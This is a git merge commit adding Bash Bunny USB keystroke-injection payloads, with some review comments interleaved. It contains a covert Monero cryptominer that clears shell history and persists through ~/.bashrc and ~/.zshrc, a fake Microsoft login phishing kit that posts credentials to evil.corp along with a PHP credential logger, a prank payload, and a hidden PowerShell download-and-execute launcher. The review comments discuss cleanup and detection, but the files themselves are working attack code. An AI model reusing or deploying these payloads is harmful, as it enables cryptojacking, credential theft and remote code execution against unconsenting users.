Merge remote-tracking branch 'upstream/master'

0iphor13 2022-07-02 17:34:24 +02:00
commit 7cd924d77b
27 changed files with 1391 additions and 0 deletions


@ -0,0 +1,41 @@
## About:
* Title: mine4me
* Description: mine4me make your target's system mine Monero for you.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution
* Target: Unix-like operating systems.
* Attackmodes: HID, Storage
## mine4me: mine4me payload makes your target system mine Monero for you. Spread payload in multiple systems to acquire more Monero.
### Features:
* Autostart mining if Internet is connected.
* Fully covert.
* CPU/GPU mining.
* Persistent.
* Autostart payload on trigger.
* Intelligently manages processes.
### Changes to be made in mine4me/systemIn/config.json:
* MANDATORY: Enter your wallet address on line no `136`.
* Change mining pool(Default pool: `pool.hashvault.pro:443`) on line no `135`.
* Default configuration is for CPU mining for four threads, Can be configured in Block starting from line no `28` to `111`.
* Change number of threads assigned for mining at line no `105`.
* GPU mining can be enabled if you know hardware of target's system. OpenCL/CUDA required.
* For AMD GPU replace `"enabled": false,` with `"enabled": true,` at line no `113`.
* For NVIDIA GPU replace `"enabled": false,` with `"enabled": true,` at line no `122`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| mine4me/ | /payloads/library/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n


@ -0,0 +1,10 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/payloads/library/mine4me/systemIn /var/tmp/.system/systemIO
chmod +x /var/tmp/.system/systemIO/systemIO
cp -r $mntt/payloads/library/mine4me/shell /tmp/
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
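Review bot: The script has no header comment recording what it leaves on the host, so anyone cleaning up after a sanctioned test, or triaging the machine, has to read the code to find out. From the visible lines it creates `/var/tmp/.system`, copies the `systemIn` directory to `/var/tmp/.system/systemIO`, marks `systemIO/systemIO` executable, and stages then deletes `/tmp/shell`. I would add a comment block at the top listing those paths and noting that removal starts with deleting `/var/tmp/.system`. A dot-prefixed directory under `/var/tmp` holding an executable is also the simplest file-system indicator to search for.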


@ -0,0 +1,10 @@
#!/bin/bash
ls -a ~/ | grep 'zshrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.zshrc
fi
ls -a ~/ | grep 'bashrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.bashrc
fi
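Review bot: Both `echo -e ... >> ~/.zshrc` and `echo -e ... >> ~/.bashrc` append an unmarked block, and nothing in the file documents the modification or how to undo it. The appended text begins with `qwerty=$(ps -a | grep systemIO)` and otherwise starts `/var/tmp/.system/systemIO/./systemIO` in the background with its output discarded, so each new interactive shell relaunches the binary unless `ps -a` already lists it. A header comment should name the two rc files and the exact block to delete. For triage, searching shell start-up files for the `/var/tmp/.system/systemIO` path finds the persistence entry.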


@ -0,0 +1,175 @@
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": false,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"argon2": [0, 2, 4, 6, 8, 10, 12, 14],
"astrobwt": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"astrobwt/v2": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"cn": [
[1, 0],
[1, 2],
[1, 8],
[1, 10]
],
"cn-heavy": [
[1, 0],
[1, 8]
],
"cn-lite": [
[1, 0],
[1, 2],
[1, 4],
[1, 6],
[1, 8],
[1, 10],
[1, 12],
[1, 14]
],
"cn-pico": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"cn/upx2": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"ghostrider": [
[8, 0],
[8, 2],
[8, 8],
[8, 10]
],
"rx": [0, 2, 8, 10],
"rx/arq": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"rx/wow": [0, 2, 4, 6, 8, 10, 12, 14],
"cn-lite/0": false,
"cn/0": false,
"rx/keva": "rx/wow"
},
"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"adl": true,
"cn-lite/0": false,
"cn/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn-lite/0": false,
"cn/0": false
},
"log-file": null,
"donate-level": 1,
"donate-over-proxy": 1,
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.hashvault.pro:443",
"user": "YOUR_WALLET_ADDRESS",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"enabled": true,
"tls": false,
"wss": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"retries": 5,
"retry-pause": 5,
"print-time": 60,
"health-print-time": 60,
"dmi": true,
"syslog": false,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"dns": {
"ipv6": false,
"ttl": 30
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false,
"pause-on-active": false
}


@ -0,0 +1,56 @@
# Title: mine4me
# Description: mine4me makes target's system mine crypto for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Unix-like operating systems.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 1400
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 200
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/mine4me/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1500
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH
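Review bot: The header gives title, category and attack modes but not the preconditions the keystroke sequence depends on, which is what someone assessing exposure needs to see. As written it needs an unlocked desktop session in which `CTRL-ALT t` opens a terminal, a host that accepts a newly attached USB keyboard and storage device, and, presumably, a user allowed to run `udisksctl mount -b` without an authentication prompt. I would add a `# Requirements:` comment stating those three points. Each one corresponds to a control that stops the sequence: session locking, USB device authorization, and polkit policy for removable-media mounts.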


@ -0,0 +1,95 @@
# "Microsoft Windows" Browser in the Browser (BitB)
- Title: "Microsoft Windows" Browser in the Browser (BitB)
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Phishing
## Description
1) Hide "PowerShell" window.
2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
4) Copies and hides the phishing folder in the current user's directory.
5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
# Choose "dark" or "light"
#
readonly BITB_THEME="dark"
# Title of the window
#
readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
# URL in the address bar
#
readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
# Content of the navigation window
#
readonly BITB_TEMPLATE="microsoft-account.html"
# Destination of the form data
#
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
```
Example of code for the data receiver :
```php
<?php
if (
$_SERVER['REQUEST_METHOD'] === 'POST'
) {
$remote_addr = (string) $_SERVER['REMOTE_ADDR'];
$user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
$username_password = (string) implode(',', $_POST);
/*
touch ./aGFrNQ_loot.log
chown www-data:www-data ./aGFrNQ_loot.log
*/
$loot = fopen('aGFrNQ_loot.log', 'a');
fwrite($loot, "##\n");
fwrite($loot, $remote_addr . "\n");
fwrite($loot, $user_agent . "\n");
fwrite($loot, $username_password . "\n");
fwrite($loot, "##\n");
fclose($loot);
}
http_response_code(302);
header('Location: https://hak5.org/');
exit;
?>
```
## Screenshots
>
> Dark Theme
>
![bitb-dark](./readme_files/bitb-dark.png)
>
> Light Theme
>
![bitb-light](./readme_files/bitb-light.png)


@ -0,0 +1,55 @@
#
# Author: TW-D
# Version: 1.0
#
param (
[string] $BITB_THEME,
[string] $BITB_TITLE,
[string] $BITB_URL,
[string] $BITB_TEMPLATE,
[string] $DROP_URL
)
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
If ($BITB_THEME -And $BITB_TITLE -And $BITB_URL -And $BITB_TEMPLATE -And $DROP_URL) {
# Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
#
(powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)
# Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
#
(powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)
# Copies and hides the phishing folder in the current user's directory.
#
$random_name = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char] $_} ) )
$phishing_path = "${HOME}\${random_name}\"
Copy-Item -Path ".\phishing_files\" -Destination "${phishing_path}" -Recurse
(Get-Item "${phishing_path}" -Force).Attributes = "Hidden"
# Builds the configuration file for the phishing page.
#
"const BITB_THEME = '${BITB_THEME}';" | Out-File -FilePath "${phishing_path}TMP.js"
"const BITB_TITLE = '${BITB_TITLE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
"const BITB_URL = '${BITB_URL}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
"const BITB_TEMPLATE = '${BITB_TEMPLATE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
# Updating the destination of the form data.
#
(Get-Content "${phishing_path}templates\${BITB_TEMPLATE}") -Replace "--DROP_URL--", "${DROP_URL}" | Set-Content "${phishing_path}templates\${BITB_TEMPLATE}"
# Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
#
$phishing_path = ($phishing_path -Replace '[\\/]', '/')
& "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app="file:///${phishing_path}index.html" --kiosk --kiosk-idle-timeout-minutes=0 --edge-kiosk-type=fullscreen --no-first-run
}
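Review bot: Nothing in the script records or reverts the system changes it makes. The four `powercfg /Change ... 0` calls overwrite the user's monitor and standby timeouts without saving the previous values, and the folder copied to `${HOME}\${random_name}\` is set to `Hidden` and never removed. I would add a comment block at the top listing both changes so they can be restored after an authorised exercise. For detection, the visible behaviour is `msedge.exe` started with `--kiosk` and `--app=file:///` pointing into the user profile, preceded by `powercfg /Change` run from a PowerShell whose window is hidden through `ShowWindowAsync`.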


@ -0,0 +1,103 @@
#!/bin/bash
#
# Title: "Microsoft Windows" Browser in the Browser (BitB)
#
# Description:
# 1) Hide "PowerShell" window.
# 2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
# 3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
# 4) Copies and hides the phishing folder in the current user's directory.
# 5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
# 6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
#
# Author: TW-D
# Version: 1.0
# Category: Phishing
# Target: Microsoft Windows
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# NOTE
# ===============
# Microsoft Edge is required on the target machine.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
# Choose "dark" or "light"
#
readonly BITB_THEME="dark"
# Title of the window
#
readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
# URL in the address bar
#
readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
# Content of the navigation window
#
readonly BITB_TEMPLATE="microsoft-account.html"
# Destination of the form data
#
readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
######## ATTACK ########
LED ATTACK
Q DELAY 8000
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 4000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 3000
Q STRING "CD \"\${BB_VOLUME}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -BITB_THEME \"${BITB_THEME}\" -BITB_TITLE \"${BITB_TITLE}\" -BITB_URL \"${BITB_URL}\" -BITB_TEMPLATE \"${BITB_TEMPLATE}\" -DROP_URL \"${DROP_URL}\""
Q ENTER
Q DELAY 3000
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH
shutdown -h 0


@ -0,0 +1,40 @@
#draggable {
font-family: "Segoe UI Light" !important;
}
#microsoft-logo {
height: 40px;
}
#title-text {
margin-left: 5px;
}
#minimize {
font-size: 20px;
}
#maximize {
font-size: 30px;
}
#container-minimize:hover, #container-maximize:hover {
opacity: 0.5;
}
#container-exit:hover {
background-color: red;
}
#exit {
font-size: 20px;
}
#ssl-logo {
height: 40px;
}
#phishing-iframe {
width: 100%;
height: 75vh;
}

File diff suppressed because one or more lines are too long


@ -0,0 +1 @@
<svg enable-background="new 0 0 2499.6 2500" viewBox="0 0 2499.6 2500" xmlns="http://www.w3.org/2000/svg"><path d="m1187.9 1187.9h-1187.9v-1187.9h1187.9z" fill="#f1511b"/><path d="m2499.6 1187.9h-1188v-1187.9h1187.9v1187.9z" fill="#80cc28"/><path d="m1187.9 2500h-1187.9v-1187.9h1187.9z" fill="#00adef"/><path d="m2499.6 2500h-1188v-1187.9h1187.9v1187.9z" fill="#fbbc09"/></svg>



@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8"?>
<svg width="752pt" height="752pt" version="1.1" viewBox="0 0 752 752" xmlns="http://www.w3.org/2000/svg">
<path d="m510.97 316.8h-12.785l-0.003906-62.512c0-56.828-46.41-103.24-103.24-103.24h-37.887c-56.828 0-103.24 46.41-103.24 103.24v62.039h-12.785c-25.574 0-45.938 20.836-45.938 45.938v192.27c0 25.574 20.836 45.938 45.938 45.938h270.41c25.574 0 45.938-20.836 45.938-45.938l0.003906-191.8c0-25.574-20.836-45.938-46.41-45.938zm-195.12-62.512c0-22.73 18.469-41.203 41.203-41.203h37.887c22.73 0 41.203 18.469 41.203 41.203v62.039h-120.29z" fill="#A6A6B2"/>
</svg>



@ -0,0 +1,19 @@
var draggable;
draggable = document.querySelector('#draggable');
$('#draggable').draggable();
document.querySelector('#container-minimize').onclick = function() {
draggable.classList.remove('w-75');
draggable.classList.add('w-50');
}
document.querySelector('#container-maximize').onclick = function() {
draggable.classList.remove('w-50');
draggable.classList.add('w-75');
}
document.querySelector('#container-exit').onclick = function() {
draggable.style.display = 'none';
setTimeout(function() { location.reload(); }, 2000);
}


@ -0,0 +1,17 @@
var theme;
switch (BITB_THEME) {
case 'dark':
theme = ' bg-dark text-white';
break;
case 'light':
theme = ' bg-light text-dark';
break;
default:
theme = ' bg-dark text-white';
}
document.querySelectorAll('.row').forEach((row) => (row.className += theme));
document.querySelector('#title-text').innerText = BITB_TITLE;
document.querySelector('#url-input').value = BITB_URL;
document.querySelector('#phishing-iframe').src = ('./templates/' + BITB_TEMPLATE);

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -0,0 +1,46 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" type="text/css" href="./assets/css/main.css?version=1.0.0" />
<link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?version=5.1.3" />
</head>
<body>
<main class="container w-50 mt-4 shadow" id="draggable">
<div class="row p-3 text-center rounded-top">
<div class="col-1 align-self-center">
<img id="microsoft-logo" src="./assets/img/logo.svg" alt="" />
</div>
<div class="col-8 align-self-center text-start">
<div class="fw-bold" id="title-text"></div>
</div>
<div class="col-1 align-self-center pt-3" id="container-minimize">
<div id="minimize">&#8212;</div>
</div>
<div class="col-1 align-self-center p-3" id="container-maximize">
<div id="maximize"></div>
</div>
<div class="col-1 align-self-center p-3" id="container-exit">
<div id="exit">X</div>
</div>
</div>
<div class="row p-3 text-center">
<div class="col-1 align-self-center">
<img id="ssl-logo" src="./assets/img/ssl.svg" alt="" />
</div>
<div class="col-11 align-self-center">
<input class="form-control" type="text" id="url-input" disabled />
</div>
</div>
<div>
<iframe id="phishing-iframe" frameBorder="0"></iframe>
</div>
</main>
<script type="text/javascript" src="./assets/libraries/jquery-3.6.0.min.js?version=3.6.0"></script>
<script type="text/javascript" src="./assets/libraries/jquery-ui.min.js?version=1.13.0"></script>
<script type="text/javascript" src="./assets/js/actions.js?version=1.0.0"></script>
<script type="text/javascript" src="./TMP.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/dispatch.js?version=1.0.0"></script>
</body>
</html>

File diff suppressed because one or more lines are too long

Binary file not shown.


Binary file not shown.



@ -0,0 +1,51 @@
# Title: Be a pest using CLSID
# Description: Uses CLSID to open system dialogs to swap the left and right mouse button, change the region to Welsh and turn off system sounds.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows 10
# Attackmodes: HID
LED SETUP
ATTACKMODE HID
# GET SWITCH_POSITION
LED ATTACK
QUACK DELAY 200
# Swop Mouse buttons L <-> R
RUN WIN "shell:::{6C8EEC18-8D75-41B2-A177-8831D59D2D50}"
QUACK DELAY 200
QUACK SPACE
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Set region to Welsh
RUN WIN "shell:::{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}"
QUACK DELAY 200
# Walser (Switzerland)
QUACK w
QUACK DELAY 100
# Welsh
QUACK w
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Turn off system sounds
RUN WIN "shell:::{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}"
QUACK DELAY 200
QUACK SHIFT TAB
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK TAB
QUACK DELAY 100
QUACK UPARROW
QUACK DELAY 100
QUACK ENTER
LED FINISH
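Review bot: The file changes three user settings through blind keystrokes and documents no way to put them back. Each `RUN WIN "shell:::{...}"` block sends keys after fixed 100–200 ms delays with no check that the expected dialog has focus, and the region step relies on two `QUACK w` presses landing on "Welsh" after "Walser (Switzerland)", so on a host whose list differs another entry may be selected. I would add a comment after the header such as `# Revert: restore the mouse button setting, the Region format and the sound scheme by hand in the same three dialogs`. It should also say that the result needs to be checked on the target rather than assumed.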


@ -0,0 +1,25 @@
# Be A Pest Using CLSID
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10
- Category: General
- Attackmode: HID
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Uses CLSID to open system dialogs.
To swap the left and right mouse button.
Change the region to Welsh.
And turn off system sounds.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Keystrokes |
| FINISHED | Green blink followed by SOLID | Injection finished |


@ -0,0 +1,33 @@
#!/bin/bash
# Title: My Pictures 2 Ascii Art
# Description: Converts Jpeg, Png & BMP's in the My Pictures to ascii art versions.
# Author: Cribbit
# Version: 1.0
# Category: General
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
LED FINISH


@ -0,0 +1,23 @@
# My Pictures 2 Ascii Art
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: General
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: Thinathayalan Ganesan & I am Jakoby
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Converts JPEG, PNG & BMP's in the My Pictures to ascii art versions.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |


@ -0,0 +1,76 @@
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing");
$AsciiChars = @( 'M', '#', '@', '%', 'X', '=', '+', '*', ';', ':', '-', '.', ' ' )
Function PS-AsciiArt
{
[CmdletBinding()]
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path, [Switch] $Reverse
)
process
{
foreach($item in $Path)
{
if ($Reverse -eq $true)
{
[array]::Reverse($AsciiChars)
}
$sb = [System.Text.StringBuilder]::new()
# Convert path to BitMap
$name = (Get-Item $Item).fullname;
$Bitmap = [System.Drawing.Bitmap]::FromFile($name)
# Resize Image
$Bitmap = (Get-ReSizedImage $BitMap 100)
# draw every other line
$draw = $true;
# loop down the image
foreach($y in (0..($BitMap.Height-1)))
{
if ($draw)
{
foreach($x in (0..($BitMap.Width-1)))
{
# get pixal
$Pixel = $Bitmap.GetPixel($X,$Y)
$Grey = ($Pixel.R + $Pixel.G + $Pixel.B) / 3;
$grayColor = [System.Drawing.Color]::FromArgb($Grey,$Grey,$Grey);
if (!$toggle)
{
$index = (($grayColor.R * ($AsciiChars.count-1)) / 255);
[void]$sb.Append($AsciiChars[$index]);
}
}
[void]$sb.AppendLine('') #Start the next row
}
# flip bool
$draw = !$draw;
}
$sb.ToString() | Out-File ([io.path]::ChangeExtension($name, "ascii.txt"))
}
}
}
Function Get-ReSizedImage
{
param(
[System.Drawing.Bitmap] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Image, [int] [parameter(mandatory=$true)] $Width
)
Process
{
$asciiHeight=0;
#Calculate the new Height of the image from its width
$asciiHeight = [int][Math]::Ceiling([double]$Image.Height * $Width / $Image.Width);
#Create a new Bitmap and define its resolution
$result = New-Object System.Drawing.Bitmap($Width, $asciiHeight);
$g = [System.Drawing.Graphics]::FromImage([System.Drawing.Image]$result);
#The interpolation mode produces high quality images
$g.InterpolationMode = [System.Drawing.Drawing2D.InterpolationMode]::HighQualityBicubic;
$g.DrawImage($Image, 0, 0, $Width, $asciiHeight);
$g.Dispose();
return $result;
}
}
Get-ChildItem ([environment]::getfolderpath("MyPictures")) | ? {$_.extension -in ".jpg", ".jpeg", ".png", ".bmp"} |% {$_.FullName | PS-AsciiArt}
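Review bot: In `PS-AsciiArt` the bitmap returned by `[System.Drawing.Bitmap]::FromFile($name)` is overwritten by the resized copy and neither object is disposed, so the GDI+ handles, and for `FromFile` the lock on the source picture, are held until the PowerShell process exits. Keep the source in its own variable and release both after the pixel loop, e.g. `$src.Dispose(); $Bitmap.Dispose()`. `$toggle` is never assigned anywhere in the file, so `if (!$toggle)` is always true and the test can be dropped. `[array]::Reverse($AsciiChars)` also runs once per item on the shared array, so with `-Reverse` the ramp flips back and forth between pictures; reversing a local copy once would avoid that.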